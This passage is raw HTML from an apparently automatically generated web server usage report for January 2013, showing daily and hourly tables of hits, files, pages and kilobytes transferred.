SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3583</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.19%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>114</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>72</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5938</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.95%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.56%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.34%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.31%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3523</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.12%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.28%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1793</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.10%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1173</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.37%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.96%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>887</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.04%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>82</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>74</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.99%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3556</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.16%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.68%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1691</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.98%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>104</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.97%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>72</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4059</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.75%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1661</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.94%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>81</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>72</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.68%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.89%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2725</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.19%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3656</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.28%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>67</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.85%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.83%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.34%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.31%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2446</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.86%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>43</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4468</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.23%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>101</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.80%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>97</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.54%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5724</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.70%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.82%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.46%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2271</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.66%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4139</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.84%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3627</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.24%</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="HOURSTATS"></A> <IMG SRC="hourly_usage_201301.png" ALT="Hourly usage for January 2013" HEIGHT=256 WIDTH=512><P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" COLSPAN=13 ALIGN=center>Hourly Statistics for January 2013</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH ALIGN=center ROWSPAN=2 BGCOLOR="#C0C0C0"><FONT SIZE="-1">Hour</FONT></TH> <TH ALIGN=center BGCOLOR="#008040" COLSPAN=3><FONT SIZE="-1">Hits</FONT></TH> <TH ALIGN=center BGCOLOR="#0080FF" COLSPAN=3><FONT SIZE="-1">Files</FONT></TH> <TH ALIGN=center BGCOLOR="#00E0FF" COLSPAN=3><FONT SIZE="-1">Pages</FONT></TH> <TH ALIGN=center BGCOLOR="#FF0000" COLSPAN=3><FONT SIZE="-1">KBytes</FONT></TH></TR> <TR><TH ALIGN=center BGCOLOR="#008040"><FONT SIZE="-2">Avg</FONT></TH> <TH ALIGN=center BGCOLOR="#008040" COLSPAN=2><FONT SIZE="-2">Total</FONT></TH> <TH ALIGN=center BGCOLOR="#0080FF"><FONT SIZE="-2">Avg</FONT></TH> <TH ALIGN=center BGCOLOR="#0080FF" COLSPAN=2><FONT SIZE="-2">Total</FONT></TH> <TH ALIGN=center BGCOLOR="#00E0FF"><FONT SIZE="-2">Avg</FONT></TH> <TH ALIGN=center BGCOLOR="#00E0FF" COLSPAN=2><FONT SIZE="-2">Total</FONT></TH> <TH ALIGN=center BGCOLOR="#FF0000"><FONT SIZE="-2">Avg</FONT></TH> <TH ALIGN=center BGCOLOR="#FF0000" COLSPAN=2><FONT SIZE="-2">Total</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.89%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>62</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1911</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.24%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>154</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>60</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1820</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.13%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>58</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.33%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>54</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>98</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3042</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.56%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.36%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>54</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1664</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.95%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>66</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.79%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.28%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>85</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2622</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.07%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>83</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.77%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>76</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.12%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>191</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5927</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.94%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>112</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>105</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>235</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7282</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">8.52%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>102</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>69</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>122</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3791</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.44%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>93</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.34%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>88</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.93%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>245</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7608</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">8.90%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>92</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.28%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>88</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.93%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>135</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4195</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.91%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>120</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.89%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>114</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>211</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6536</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.65%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>115</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>105</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.09%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>186</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5759</B></FONT></TD> <TD 